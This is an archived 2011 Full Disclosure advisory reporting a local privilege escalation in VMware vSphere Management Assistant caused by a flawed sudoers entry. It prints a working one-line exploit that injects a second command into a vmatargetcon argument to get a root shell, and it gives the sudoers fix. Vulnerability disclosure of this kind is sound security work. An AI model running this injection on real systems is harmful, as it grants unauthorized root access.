Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation
From: Piotr Duszynski <piotr () duszynski eu>
Date: Mon, 16 May 2011 09:24:13 +0200

=======================================================================
Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation
=======================================================================

Affected Software : Vmware vSphere Management Assistant (vMA)
Severity          : Medium
Local/Remote      : Local
Author            : @drk1wi

[Summary]

Due to an error in the /etc/sudoers file it is possible to run 
arbitrary shell commands within the context of root user.

[Vulnerability Details]

[vi-admin () vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash 
"'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root () vMA vi-admin]#

[Time-line]

27/04/2010 - Vendor notified
28/04/2010 - Vendor response
???        - Vendor patch release
16/05/2011 - Public disclosure

[Fix Information]

Edit the /etc/sudoers file.

Cheers,
@drk1wi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation Piotr Duszynski (May 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault